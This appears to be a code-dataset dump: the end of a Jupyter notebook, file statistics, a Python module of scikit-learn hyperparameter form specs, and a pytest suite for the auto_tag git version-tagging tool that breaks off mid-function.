    "plt.title('H= {:.2f} $\\pm$ {:.2f}'.format(maximo, sigma))\n",
"plt.xlabel('H')\n",
"plt.ylabel('prob(H|datos)')\n",
"plt.legend()\n",
"plt.savefig('coins')"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": []
}
],
"metadata": {
"kernelspec": {
"display_name": "Python 3",
"language": "python",
"name": "python3"
},
"language_info": {
"codemirror_mode": {
"name": "ipython",
"version": 3
},
"file_extension": ".py",
"mimetype": "text/x-python",
"name": "python",
"nbconvert_exporter": "python",
"pygments_lexer": "ipython3",
"version": "3.7.6"
}
},
"nbformat": 4,
"nbformat_minor": 4
}
| 72.35514
| 2,250
| 0.640532
| 1,397
| 7,742
| 3.539012
| 0.137437
| 0.302994
| 0.463592
| 0.299757
| 0.703479
| 0.681837
| 0.668083
| 0.658778
| 0.644215
| 0.644013
| 0
| 0.304924
| 0.113407
| 7,742
| 106
| 2,251
| 73.037736
| 0.415355
| 0
| 0
| 0.216981
| 0
| 0.018868
| 0.703048
| 0.461896
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.018868
| 0
| 0.018868
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
6c942af2f0d312dcf04b3c392ee35946921207ed
| 22,803
|
py
|
Python
|
src/constants/model_params.py
|
Supreeth-Shetty/Projectathon---Simplified-AI
|
3fc26a58a9370d119811ac4e864af977c21f6c40
|
[
"MIT"
] | 8
|
2021-12-23T06:05:00.000Z
|
2021-12-26T05:39:00.000Z
|
src/constants/model_params.py
|
Supreeth-Shetty/Projectathon---Simplified-AI
|
3fc26a58a9370d119811ac4e864af977c21f6c40
|
[
"MIT"
] | null | null | null |
src/constants/model_params.py
|
Supreeth-Shetty/Projectathon---Simplified-AI
|
3fc26a58a9370d119811ac4e864af977c21f6c40
|
[
"MIT"
] | 2
|
2021-12-23T06:10:11.000Z
|
2021-12-23T07:24:28.000Z
|
# Form-field specs for linear-regression hyper-parameters: each dict names
# one field, its widget kind ('type'), candidate/default values, value dtype,
# and whether an empty value is accepted.
LinearRegression_Params = [
    {'name': 'fit_intercept', 'type': 'select', 'values': [True, False], 'dtype': 'boolean', 'accept_none': False},
    {'name': 'positive', 'type': 'select', 'values': [False, True], 'dtype': 'boolean', 'accept_none': False},
]
# NOTE(review): these lists look like specs for a parameter-entry form —
# each dict describes one field: widget kind ("type": input/select), the
# default or candidate "values", the value "dtype", and whether an empty
# value is accepted. Confirm against the consuming form renderer.
# Ridge regression hyper-parameters.
Ridge_Params = [
    {"name": "alpha", "type": "input", "values": 1.0, "dtype": "float", "accept_none": False},
    {"name": "fit_intercept", "type": "select", "values": [True, False], "dtype": "boolean", "accept_none": False},
    {"name": "copy_X", "type": "select", "values": [True, False], "dtype": "boolean", "accept_none": False},
    {"name": "max_iter", "type": "input", "values": "", "dtype": "int", "accept_none": True},
    {"name": "tol", "type": "input", "values": 0.001, "dtype": "float", "accept_none": False},
    {"name": "solver", "type": "select",
     "values": ["auto", "svd", "cholesky", "lsqr", "sparse_cg", "sag", "saga", "lbfgs"], "dtype": "string",
     "accept_none": False},
    {"name": "random_state", "type": "input", "values": "", "dtype": "int", "accept_none": True}
]
# Lasso regression hyper-parameters.
Lasso_Params = [
    {"name": "alpha", "type": "input", "values": 1.0, "dtype": "float", "accept_none": False},
    {"name": "fit_intercept", "type": "select", "values": [True, False], "dtype": "boolean", "accept_none": False},
    {"name": "precompute", "type": "select", "values": [False, True], "dtype": "boolean", "accept_none": False},
    {"name": "copy_X", "type": "select", "values": [True, False], "dtype": "boolean", "accept_none": False},
    {"name": "max_iter", "type": "input", "values": 1000, "dtype": "int", "accept_none": False},
    {"name": "tol", "type": "input", "values": 0.0001, "dtype": "float", "accept_none": False},
    {"name": "warm_start", "type": "select", "values": [False, True], "dtype": "boolean", "accept_none": False},
    {"name": "random_state", "type": "input", "values": 1, "dtype": "int", "accept_none": True},
    {"name": "selection", "type": "select", "values": ["cyclic", "random", "auto"], "dtype": "string",
     "accept_none": False}]
# ElasticNet regression hyper-parameters.
ElasticNet_Params = [
    {"name": "alpha", "type": "input", "values": 1.0, "dtype": "float", "accept_none": False},
    {"name": "l1_ratio", "type": "input", "values": 0.5, "dtype": "float", "accept_none": False},
    {"name": "fit_intercept", "type": "select", "values": [True, False], "dtype": "boolean", "accept_none": False},
    {"name": "precompute", "type": "select", "values": [False, True], "dtype": "boolean", "accept_none": False},
    {"name": "max_iter", "type": "input", "values": 1000, "dtype": "int", "accept_none": False},
    {"name": "copy_X", "type": "select", "values": [True, False], "dtype": "boolean", "accept_none": False},
    {"name": "tol", "type": "input", "values": 0.0001, "dtype": "float", "accept_none": False},
    {"name": "warm_start", "type": "select", "values": [False, True], "dtype": "boolean", "accept_none": False},
    {"name": "random_state", "type": "input", "values": 1, "dtype": "int", "accept_none": True},
    {"name": "selection", "type": "select", "values": ["cyclic", "random"], "dtype": "string", "accept_none": False}]
# Decision-tree regressor hyper-parameters (form-field specs; see note above
# Ridge_Params-style lists: widget "type", default "values", value "dtype",
# and whether an empty value is accepted).
DecisionTreeRegressor_Params = [
    {"name": "criterion", "type": "select", "values": ["squared_error", "friedman_mse", "absolute_error", "poisson"],
     "dtype": "string", "accept_none": False},
    {"name": "splitter", "type": "select", "values": ["best", "random"], "dtype": "string", "accept_none": False},
    {"name": "max_depth", "type": "input", "values": "", "dtype": "int", "accept_none": True},
    {"name": "min_samples_split", "type": "input", "values": 2, "dtype": "int", "accept_none": False},
    {"name": "min_samples_leaf", "type": "input", "values": 1, "dtype": "int", "accept_none": False},
    {"name": "min_weight_fraction_leaf", "type": "input", "values": 0.0, "dtype": "float", "accept_none": False},
    {"name": "max_features", "type": "select", "values": ["auto", "sqrt", "log2"], "dtype": "string",
     "accept_none": False},
    {"name": "max_leaf_nodes", "type": "input", "values": "", "dtype": "int", "accept_none": True},
    {"name": "min_impurity_decrease", "type": "input", "values": 0.0, "dtype": "float", "accept_none": False},
    {"name": "ccp_alpha", "type": "input", "values": 0.0, "dtype": "float", "accept_none": True}
]
# Random-forest regressor hyper-parameters.
RandomForestRegressor_Params = [
    {"name": "n_estimators", "type": "input", "values": 100, "dtype": "int", "accept_none": False},
    {"name": "criterion", "type": "select", "values": ["squared_error", "absolute_error", "poisson"], "dtype": "string",
     "accept_none": False},
    {"name": "max_depth", "type": "input", "values": 5, "dtype": "int", "accept_none": True},
    {"name": "min_samples_split", "type": "input", "values": 2, "dtype": "int", "accept_none": False},
    {"name": "min_samples_leaf", "type": "input", "values": 0.1, "dtype": "float", "accept_none": False},
    {"name": "min_weight_fraction_leaf", "type": "input", "values": 0.0, "dtype": "float", "accept_none": False},
    {"name": "max_features", "type": "select", "values": ["auto", "sqrt", "log2"], "dtype": "string",
     "accept_none": False},
    {"name": "max_leaf_nodes", "type": "input", "values": 4, "dtype": "int", "accept_none": True},
    {"name": "min_impurity_decrease", "type": "input", "values": 0.0, "dtype": "float", "accept_none": False},
    {"name": "bootstrap", "type": "select", "values": [True, False], "dtype": "boolean", "accept_none": False},
    {"name": "oob_score", "type": "select", "values": [False, True], "dtype": "boolean", "accept_none": False},
    {"name": "n_jobs", "type": "input", "values": -1, "dtype": "int", "accept_none": True},
    {"name": "random_state", "type": "input", "values": 1, "dtype": "int", "accept_none": True},
    {"name": "verbose", "type": "input", "values": 0, "dtype": "int", "accept_none": False},
    {"name": "warm_start", "type": "select", "values": [False, True], "dtype": "boolean", "accept_none": False},
    {"name": "ccp_alpha", "type": "input", "values": 0.0, "dtype": "float", "accept_none": False},
    {"name": "max_samples", "type": "input", "values": 1, "dtype": "float", "accept_none": True}]
# Support-vector regressor hyper-parameters.
SVR_params = [{"name": "kernel", "type": "select", "values": ["rbf", "linear", "poly", "sigmoid", "precomputed"],
               "dtype": "string", "accept_none": False},
              {"name": "degree", "type": "input", "values": 3, "dtype": "int", "accept_none": False},
              {"name": "gamma", "type": "select", "values": ["scale", "auto"], "dtype": "string", "accept_none": False},
              {"name": "coef0", "type": "input", "values": 0.0, "dtype": "float", "accept_none": False},
              {"name": "tol", "type": "input", "values": 0.001, "dtype": "float", "accept_none": False},
              {"name": "C", "type": "input", "values": 1.0, "dtype": "float", "accept_none": False},
              {"name": "epsilon", "type": "input", "values": 0.1, "dtype": "float", "accept_none": False},
              {"name": "shrinking", "type": "select", "values": [True, False], "dtype": "boolean",
               "accept_none": False},
              {"name": "cache_size", "type": "input", "values": 200, "dtype": "float", "accept_none": False},
              {"name": "verbose", "type": "select", "values": [False, True], "dtype": "boolean", "accept_none": False},
              {"name": "max_iter", "type": "input", "values": -1, "dtype": "int", "accept_none": False}]
# AdaBoost regressor hyper-parameter form spec. The misspelled name
# 'Adaboot' is kept: renaming it would break importers elsewhere.
AdabootRegressor_Params = [
    {'name': 'base_estimator', 'type': 'input', 'values': None, 'dtype': 'object', 'accept_none': True},
    {'name': 'n_estimators', 'type': 'input', 'values': 50, 'dtype': 'int', 'accept_none': False},
    {'name': 'learning_rate', 'type': 'input', 'values': 1.0, 'dtype': 'float', 'accept_none': False},
    {'name': 'loss', 'type': 'select', 'values': ['linear', 'square', 'exponential'], 'dtype': 'string', 'accept_none': False},
    {'name': 'random_state', 'type': 'input', 'values': 1, 'dtype': 'int', 'accept_none': True},
]
# Gradient-boosting regressor hyper-parameters (form-field specs: widget
# "type", default "values", value "dtype", and whether empty is accepted).
GradientBoostRegressor_Params = [
    {"name": "loss", "type": "select", "values": ['squared_error', 'absolute_error', 'huber', 'quantile'],
     "dtype": "string", "accept_none": False},
    {"name": "learning_rate", "type": "input", "values": 0.1, "dtype": "float", "accept_none": False},
    {"name": "n_estimators", "type": "input", "values": 100, "dtype": "int", "accept_none": False},
    {"name": "subsample", "type": "input", "values": 1.0, "dtype": "float", "accept_none": False},
    {"name": "criterion", "type": "select", "values": ['friedman_mse', 'squared_error', 'mae', 'mse'],
     "dtype": "string", "accept_none": False},
    {"name": "min_samples_split", "type": "input", "values": 2, "dtype": "int", "accept_none": False},
    {"name": "min_samples_leaf", "type": "input", "values": 1, "dtype": "int", "accept_none": False},
    {"name": "min_weight_fraction_leaf", "type": "input", "values": 0.0, "dtype": "float", "accept_none": False},
    {"name": "max_depth", "type": "input", "values": 3, "dtype": "int", "accept_none": False},
    {"name": "min_impurity_decrease", "type": "input", "values": 0.0, "dtype": "float", "accept_none": False},
    {"name": "init", "type": "input", "values": "zero", "dtype": "string", "accept_none": True},
    # BUG FIX: this entry had '"input": "int"' instead of '"type": "input"',
    # so it was the only field in the file with no "type" key. Restored to
    # the same shape as every other random_state entry.
    {"name": "random_state", "type": "input", "values": 1, "dtype": "int", "accept_none": True},
    {"name": "max_features", "type": "select", "values": ['auto', 'sqrt', 'log2'], "dtype": "string",
     "accept_none": False},
    {"name": "alpha", "type": "input", "values": 0.9, "dtype": "float", "accept_none": False},
    {"name": "verbose", "type": "input", "values": 0, "dtype": "int", "accept_none": False},
    {"name": "max_leaf_nodes", "type": "input", "values": 4, "dtype": "int", "accept_none": True},
    {"name": "warm_start", "type": "select", "values": [False, True], "dtype": "boolean", "accept_none": False},
    {"name": "validation_fraction", "type": "input", "values": 0.1, "dtype": "float", "accept_none": False},
    {"name": "n_iter_no_change", "type": "input", "values": 95, "dtype": "int", "accept_none": True},
    {"name": "tol", "type": "input", "values": 0.0001, "dtype": "float", "accept_none": False},
    {"name": "ccp_alpha", "type": "input", "values": 0.0, "dtype": "float", "accept_none": False}]
# -----------------------------------------------------------------------------------------------------------
# CLASSIFICATION -------------
# Logistic-regression hyper-parameters (form-field specs: widget "type",
# default "values", value "dtype", and whether an empty value is accepted).
# NOTE(review): 'None' in the penalty choices is the literal string, not the
# None object — presumably mapped by the consumer; confirm.
LogisticRegression_Params = [
    {"name": "penalty", "type": "select", "values": ['l2', 'l1', 'elasticnet', 'None'], "dtype": "string",
     "accept_none": True},
    {"name": "dual", "type": "select", "values": [False, True], "dtype": "boolean", "accept_none": False},
    {"name": "tol", "type": "input", "values": 0.0001, "dtype": "float", "accept_none": False},
    {"name": "C", "type": "input", "values": 1.0, "dtype": "float", "accept_none": False},
    {"name": "fit_intercept", "type": "select", "values": [True, False], "dtype": "boolean", "accept_none": False},
    {"name": "intercept_scaling", "type": "input", "values": 1.0, "dtype": "float", "accept_none": False},
    {"name": "class_weight", "type": "select", "values": ["", 'balanced'], "dtype": "string", "accept_none": True},
    {"name": "random_state", "type": "input", "values": 101, "dtype": "int", "accept_none": True},
    {"name": "solver", "type": "select", "values": ["lbfgs", "newton-cg", "liblinear", "sag", "saga"],
     "dtype": "string", "accept_none": False},
    {"name": "max_iter", "type": "input", "values": 100, "dtype": "int", "accept_none": False},
    {"name": "multi_class", "type": "select", "values": ["auto", "ovr", "multinomial"], "dtype": "string",
     "accept_none": False},
    {"name": "verbose", "type": "input", "values": 0, "dtype": "int", "accept_none": False},
    {"name": "warm_start", "type": "select", "values": [False, True], "dtype": "boolean", "accept_none": False},
    {"name": "n_jobs", "type": "input", "values": -1, "dtype": "int", "accept_none": True},
    {"name": "l1_ratio", "type": "input", "values": 0.5, "dtype": "float", "accept_none": True}]
# Support-vector classifier hyper-parameters.
SVC_Params = [
    {"name": "C", "type": "input", "values": 1.0, "dtype": "float", "accept_none": False},
    {"name": "kernel", "type": "select", "values": ['rbf', 'poly', 'sigmoid', 'linear', 'precomputed'],
     "dtype": "string", "accept_none": False},
    {"name": "degree", "type": "input", "values": 3, "dtype": "int", "accept_none": False},
    {"name": "gamma", "type": "select", "values": ["scale", "auto"], "dtype": "string", "accept_none": False},
    {"name": "coef0", "type": "input", "values": 0.0, "dtype": "float", "accept_none": False},
    {"name": "shrinking", "type": "select", "values": [True, False], "dtype": "boolean", "accept_none": False},
    {"name": "probability", "type": "select", "values": [False, True], "dtype": "boolean", "accept_none": False},
    {"name": "tol", "type": "input", "values": 0.001, "dtype": "float", "accept_none": False},
    {"name": "cache_size", "type": "input", "values": 200, "dtype": "float", "accept_none": False},
    {"name": "class_weight", "type": "select", "values": ['balanced'], "dtype": "string", "accept_none": True},
    {"name": "verbose", "type": "select", "values": [False, True], "dtype": "boolean", "accept_none": False},
    {"name": "max_iter", "type": "input", "values": -1, "dtype": "int", "accept_none": False},
    {"name": "break_ties", "type": "select", "values": [False, True], "dtype": "boolean", "accept_none": False},
    {"name": "random_state", "type": "input", "values": 101, "dtype": "int", "accept_none": True}]
# K-nearest-neighbours classifier hyper-parameters.
KNeighborsClassifier_Params = [
    {"name": "n_neighbors", "type": "input", "values": 5, "dtype": "int", "accept_none": False},
    {"name": "weights", "type": "select", "values": ['uniform', 'distance'], "dtype": "string", "accept_none": False},
    {"name": "algorithm", "type": "select", "values": ["auto", "ball_tree", "kd_tree", "brute"], "dtype": "string",
     "accept_none": False},
    {"name": "leaf_size", "type": "input", "values": 30, "dtype": "int", "accept_none": False},
    {"name": "p", "type": "input", "values": 2, "dtype": "int", "accept_none": True},
    {"name": "metric", "type": "select", "values": ['minkowski', 'euclidean', 'manhattan', 'chebyshev', 'mahalanobis'],
     "dtype": "string", "accept_none": False},
    {"name": "n_jobs", "type": "input", "values": -1, "dtype": "int", "accept_none": True}
]
# Decision-tree classifier hyper-parameters (form-field specs: widget
# "type", default "values", value "dtype", and whether empty is accepted).
DecisionTreeClassifier_Params = [
    {"name": "criterion", "type": "select", "values": ['gini', 'entropy'], "dtype": "string", "accept_none": False},
    {"name": "splitter", "type": "select", "values": ['best', 'random'], "dtype": "string", "accept_none": False},
    {"name": "max_depth", "type": "input", "values": 5, "dtype": "int", "accept_none": False},
    {"name": "min_samples_split", "type": "input", "values": 2, "dtype": "int", "accept_none": False},
    {"name": "min_samples_leaf", "type": "input", "values": 1, "dtype": "int", "accept_none": False},
    {"name": "min_weight_fraction_leaf", "type": "input", "values": 0.0, "dtype": "float", "accept_none": False},
    {"name": "max_features", "type": "select", "values": ["auto", "sqrt", "log2"], "dtype": "string",
     "accept_none": True},
    {"name": "random_state", "type": "input", "values": 101, "dtype": "int", "accept_none": True},
    {"name": "max_leaf_nodes", "type": "input", "values": 5, "dtype": "int", "accept_none": True},
    {"name": "min_impurity_decrease", "type": "input", "values": 0.0, "dtype": "float", "accept_none": True},
    {"name": "class_weight", "type": "select", "values": ["balanced"], "dtype": "string", "accept_none": True},
    {"name": "ccp_alpha", "type": "input", "values": 0.0, "dtype": "float", "accept_none": True}]
# Random-forest classifier hyper-parameters.
RandomForestClassifier_Params = [
    {"name": "n_estimators", "type": "input", "values": 100, "dtype": "int", "accept_none": False},
    {"name": "criterion", "type": "select", "values": ["gini", "entropy"], "dtype": "string", "accept_none": False},
    {"name": "max_depth", "type": "input", "values": 5, "dtype": "int", "accept_none": True},
    {"name": "min_samples_split", "type": "input", "values": 2, "dtype": "int", "accept_none": False},
    {"name": "min_samples_leaf", "type": "input", "values": 1, "dtype": "int", "accept_none": False},
    {"name": "min_weight_fraction_leaf", "type": "input", "values": 0.0, "dtype": "float", "accept_none": False},
    {"name": "max_features", "type": "select", "values": ["auto", "sqrt", "log2"], "dtype": "string",
     "accept_none": True},
    {"name": "max_leaf_nodes", "type": "input", "values": 5, "dtype": "int", "accept_none": True},
    {"name": "min_impurity_decrease", "type": "input", "values": 0.0, "dtype": "float", "accept_none": True},
    {"name": "bootstrap", "type": "select", "values": [True, False], "dtype": "boolean", "accept_none": False},
    {"name": "oob_score", "type": "select", "values": [False, True], "dtype": "boolean", "accept_none": False},
    {"name": "n_jobs", "type": "input", "values": -1, "dtype": "int", "accept_none": True},
    {"name": "random_state", "type": "input", "values": 101, "dtype": "int", "accept_none": True},
    {"name": "verbose", "type": "input", "values": 0, "dtype": "int", "accept_none": False},
    {"name": "warm_start", "type": "select", "values": [False, True], "dtype": "boolean", "accept_none": False},
    {"name": "class_weight", "type": "select", "values": ["balanced", "balanced_subsample"], "dtype": "string",
     "accept_none": True},
    {"name": "ccp_alpha", "type": "input", "values": 0.0, "dtype": "float", "accept_none": True},
    {"name": "max_samples", "type": "input", "values": "", "dtype": "int", "accept_none": True}]
# Gradient-boosting classifier hyper-parameters (form-field specs: widget
# "type", default "values", value "dtype", and whether empty is accepted).
GradientBoostingClassifier_Params = [
    {"name": "loss", "type": "select", "values": ["deviance", "exponential"], "dtype": "string", "accept_none": False},
    {"name": "learning_rate", "type": "input", "values": 0.1, "dtype": "float", "accept_none": False},
    {"name": "n_estimators", "type": "input", "values": 100, "dtype": "int", "accept_none": False},
    {"name": "subsample", "type": "input", "values": 1.0, "dtype": "float", "accept_none": False},
    {"name": "criterion", "type": "select", "values": ["friedman_mse", "squared_error", "mae"], "dtype": "string",
     "accept_none": False},
    {"name": "min_samples_split", "type": "input", "values": 2, "dtype": "int", "accept_none": False},
    {"name": "min_samples_leaf", "type": "input", "values": 1, "dtype": "int", "accept_none": False},
    {"name": "min_weight_fraction_leaf", "type": "input", "values": 0.0, "dtype": "float", "accept_none": False},
    {"name": "max_depth", "type": "input", "values": 3, "dtype": "int", "accept_none": False},
    {"name": "min_impurity_decrease", "type": "input", "values": 0.0, "dtype": "float", "accept_none": False},
    {"name": "random_state", "type": "input", "values": 100, "dtype": "int", "accept_none": True},
    {"name": "max_features", "type": "select", "values": ["auto", "sqrt", "log2"], "dtype": "string",
     "accept_none": True},
    {"name": "verbose", "type": "input", "values": 0, "dtype": "int", "accept_none": False},
    {"name": "max_leaf_nodes", "type": "input", "values": 5, "dtype": "int", "accept_none": True},
    {"name": "warm_start", "type": "select", "values": [False, True], "dtype": "boolean", "accept_none": False},
    {"name": "validation_fraction", "type": "input", "values": 0.1, "dtype": "float", "accept_none": False},
    {"name": "n_iter_no_change", "type": "input", "values": 5, "dtype": "int", "accept_none": True},
    {"name": "tol", "type": "input", "values": 0.0001, "dtype": "float", "accept_none": False},
    {"name": "ccp_alpha", "type": "input", "values": 0.0, "dtype": "float", "accept_none": False}]
# AdaBoost classifier hyper-parameters.
AdaBoostClassifier_Params = [
    {"name": "base_estimator", "type": "input", "values": None, "dtype": "object", "accept_none": True},
    {"name": "n_estimators", "type": "input", "values": 50, "dtype": "int", "accept_none": False},
    {"name": "learning_rate", "type": "input", "values": 1.0, "dtype": "float", "accept_none": False},
    {"name": "algorithm", "type": "select", "values": ["SAMME.R", "SAMME"], "dtype": "string", "accept_none": False},
    {"name": "random_state", "type": "input", "values": 1, "dtype": "int", "accept_none": True}]
# -----------------------------------------------------------------------------------------------------------
# K-means clustering hyper-parameters (form-field specs: widget "type",
# default "values", value "dtype", and whether an empty value is accepted).
KmeansClustering_Params = [
    {"name": "n_clusters", "type": "input", "values": 8, "dtype": "int", "accept_none": False},
    {"name": "init", "type": "select", "values": ["k-means++", "random"], "dtype": "string", "accept_none": False},
    {"name": "n_init", "type": "input", "values": 10, "dtype": "int", "accept_none": False},
    {"name": "max_iter", "type": "input", "values": 300, "dtype": "int", "accept_none": False},
    # BUG FIX: "type" was "float", which is not a widget kind used anywhere
    # else in this file ("input"/"select"); "float" belongs in "dtype".
    {"name": "tol", "type": "input", "values": 0.0001, "dtype": "float", "accept_none": False},
    {"name": "verbose", "type": "input", "values": 0, "dtype": "int", "accept_none": False},
    {"name": "random_state", "type": "input", "values": 1, "dtype": "int", "accept_none": True},
    {"name": "copy_x", "type": "select", "values": [True, False], "dtype": "boolean", "accept_none": False},
    {"name": "algorithm", "type": "select", "values": ["auto", "full", "elkan"], "dtype": "string",
     "accept_none": False}]
# DBSCAN clustering hyper-parameters (form-field specs: widget "type",
# default "values", value "dtype", and whether an empty value is accepted).
DbscanClustering_Params = [
    # BUG FIX: "type" was "float", which is not a widget kind used anywhere
    # else in this file ("input"/"select"); "float" belongs in "dtype".
    {"name": "eps", "type": "input", "values": 0.5, "dtype": "float", "accept_none": False},
    {"name": "min_samples", "type": "input", "values": 5, "dtype": "int", "accept_none": False},
    {"name": "metric", "type": "select", "values": ['euclidean', 'cityblock', 'cosine', 'l1', 'l2', 'manhattan'],
     "dtype": "string", "accept_none": False},
    {"name": "algorithm", "type": "select", "values": ["auto", "ball_tree", "kd_tree", "brute"], "dtype": "string",
     "accept_none": False},
    {"name": "leaf_size", "type": "input", "values": 30, "dtype": "int", "accept_none": False},
    {"name": "n_jobs", "type": "input", "values": -1, "dtype": "int", "accept_none": True}]
# Agglomerative-clustering hyper-parameter form spec.
AgglomerativeClustering_Params = [
    {'name': 'n_clusters', 'type': 'input', 'values': 2, 'dtype': 'int', 'accept_none': True},
    {'name': 'affinity', 'type': 'select', 'values': ['euclidean'], 'dtype': 'string', 'accept_none': False},
    {'name': 'compute_full_tree', 'type': 'select', 'values': ['auto'], 'dtype': 'string', 'accept_none': False},
    {'name': 'linkage', 'type': 'select', 'values': ['ward', 'complete', 'average', 'single'], 'dtype': 'string', 'accept_none': False},
    {'name': 'compute_distances', 'type': 'select', 'values': [False, True], 'dtype': 'boolean', 'accept_none': False},
]
# Maps the lowercase string booleans seen in payloads to real booleans.
Params_Mappings = {'true': True, 'false': False}
| 81.439286
| 120
| 0.568873
| 2,618
| 22,803
| 4.798701
| 0.074866
| 0.16079
| 0.180291
| 0.21627
| 0.915944
| 0.901297
| 0.878373
| 0.850752
| 0.83738
| 0.820664
| 0
| 0.012667
| 0.144893
| 22,803
| 279
| 121
| 81.731183
| 0.631622
| 0.0107
| 0
| 0.589844
| 0
| 0
| 0.488761
| 0.011971
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6cbbbd484bfb38bdfc38fb311ee2be38282e8c90
| 11,757
|
py
|
Python
|
auto_tag/tests/test_core.py
|
fossabot/auto-tag
|
ec43bfbe2ae610219c9cfe7aab5be9c4328f83ab
|
[
"MIT"
] | null | null | null |
auto_tag/tests/test_core.py
|
fossabot/auto-tag
|
ec43bfbe2ae610219c9cfe7aab5be9c4328f83ab
|
[
"MIT"
] | null | null | null |
auto_tag/tests/test_core.py
|
fossabot/auto-tag
|
ec43bfbe2ae610219c9cfe7aab5be9c4328f83ab
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
"""
Test simple flows of the AutoTag application
"""
import os
import git
import pytest
from auto_tag import core
# pylint:disable=invalid-name
# (existing tag, expected next tag) pairs, one table per semver bump level.
TEST_DATA_SIMPLE_TAG_PATCH_BUMP = [('0.0.1', '0.0.2'), ('0.1.1', '0.1.2'), ('1.0.1', '1.0.2')]
TEST_DATA_SIMPLE_TAG_PATCH_MINOR = [('0.0.1', '0.1.0'), ('0.1.1', '0.2.0'), ('1.0.1', '1.1.0')]
TEST_DATA_SIMPLE_TAG_PATCH_MAJOR = [('0.0.1', '1.0.0'), ('0.1.1', '1.0.0'), ('1.0.1', '2.0.0')]
# Git identities used when the tests configure tag authorship.
TEST_NAME = 'test_user'
TEST_EMAIL = 'test@email.com'
TEST_NAME_2 = 'test_user_2'
TEST_EMAIL_2 = 'test_2@email.com'
def test_simple_flow_no_existing_tag(simple_repo, default_detectors):
    """A repository with no tags at all receives the initial 0.0.1 tag."""
    repository = git.Repo(simple_repo, odbt=git.GitDB)
    tagger = core.AutoTag(
        repo=simple_repo,
        detectors=default_detectors,
        branch='master',
        git_name=TEST_NAME,
        git_email=TEST_EMAIL,
        upstream_remotes=None)
    tagger.work()
    assert '0.0.1' in repository.tags
@pytest.mark.parametrize('existing_tag, next_tag',
                         TEST_DATA_SIMPLE_TAG_PATCH_BUMP)
def test_simple_flow_existing_tag(
        existing_tag, next_tag, simple_repo, default_detectors):
    """An existing tag on the oldest commit is bumped to the next patch."""
    repository = git.Repo(simple_repo, odbt=git.GitDB)
    # Anchor the pre-existing tag on the first (oldest) commit.
    history = list(repository.iter_commits())
    repository.create_tag(existing_tag, ref=history[-1])
    tagger = core.AutoTag(
        repo=simple_repo,
        detectors=default_detectors,
        branch='master',
        git_name=TEST_NAME,
        git_email=TEST_EMAIL,
        upstream_remotes=None)
    tagger.work()
    assert next_tag in repository.tags
@pytest.mark.parametrize('existing_tag, next_tag',
                         TEST_DATA_SIMPLE_TAG_PATCH_BUMP)
def test_simple_flow_existing_tag_on_last_commit(
        existing_tag, next_tag, simple_repo, default_detectors):
    """With skip_if_exists, a tag already on HEAD suppresses a new tag."""
    repository = git.Repo(simple_repo, odbt=git.GitDB)
    # Tag the newest commit so AutoTag finds nothing left to tag.
    history = list(repository.iter_commits())
    repository.create_tag(existing_tag, ref=history[0])
    tagger = core.AutoTag(
        repo=simple_repo,
        detectors=default_detectors,
        branch='master',
        git_name=TEST_NAME,
        git_email=TEST_EMAIL,
        upstream_remotes=None,
        skip_if_exists=True)
    tagger.work()
    assert next_tag not in repository.tags
@pytest.mark.parametrize('existing_tag, next_tag',
                         TEST_DATA_SIMPLE_TAG_PATCH_BUMP)
def test_simple_flow_existing_tag_append_v(
        existing_tag, next_tag, simple_repo, default_detectors):
    """With append_v, the produced tag is prefixed with a literal 'v'."""
    repository = git.Repo(simple_repo, odbt=git.GitDB)
    history = list(repository.iter_commits())
    repository.create_tag(existing_tag, ref=history[-1])
    tagger = core.AutoTag(
        repo=simple_repo,
        detectors=default_detectors,
        branch='master',
        git_name=TEST_NAME,
        git_email=TEST_EMAIL,
        upstream_remotes=None,
        append_v=True)
    tagger.work()
    assert 'v' + next_tag in repository.tags
@pytest.mark.parametrize('existing_tag, next_tag',
                         TEST_DATA_SIMPLE_TAG_PATCH_MINOR)
def test_simple_flow_existing_tag_minor_bump(
        existing_tag, next_tag, simple_repo_minor_commit, default_detectors):
    """A feature commit in the fixture repo triggers a minor version bump."""
    repository = git.Repo(simple_repo_minor_commit, odbt=git.GitDB)
    history = list(repository.iter_commits())
    repository.create_tag(existing_tag, ref=history[-1])
    tagger = core.AutoTag(
        repo=simple_repo_minor_commit,
        detectors=default_detectors,
        branch='master',
        git_name=TEST_NAME,
        git_email=TEST_EMAIL,
        upstream_remotes=None)
    tagger.work()
    assert next_tag in repository.tags
@pytest.mark.parametrize('existing_tag, next_tag',
                         TEST_DATA_SIMPLE_TAG_PATCH_MAJOR)
def test_simple_flow_existing_tag_major_bump(
        existing_tag, next_tag, simple_repo_major_commit, default_detectors):
    """A breaking-change commit in the fixture repo triggers a major bump."""
    repository = git.Repo(simple_repo_major_commit, odbt=git.GitDB)
    history = list(repository.iter_commits())
    repository.create_tag(existing_tag, ref=history[-1])
    tagger = core.AutoTag(
        repo=simple_repo_major_commit,
        detectors=default_detectors,
        branch='master',
        git_name=TEST_NAME,
        git_email=TEST_EMAIL,
        upstream_remotes=None)
    tagger.work()
    assert next_tag in repository.tags
def test_push_to_remote(simple_repo, tmpdir, default_detectors):
    """A tag created in a clone is pushed back to its 'origin' remote."""
    origin = git.Repo(simple_repo, odbt=git.GitDB)
    clone_path = os.path.join(tmpdir, 'cloned-repo')
    clone = origin.clone(clone_path)
    tagger = core.AutoTag(
        repo=clone_path,
        detectors=default_detectors,
        branch='master',
        git_name=TEST_NAME,
        git_email=TEST_EMAIL,
        upstream_remotes=['origin'])
    tagger.work()
    # The tag must exist locally and on the remote it was pushed to.
    assert '0.0.1' in clone.tags
    assert '0.0.1' in origin.tags
def test_push_to_multiple_remotes(simple_repo, tmpdir, default_detectors):
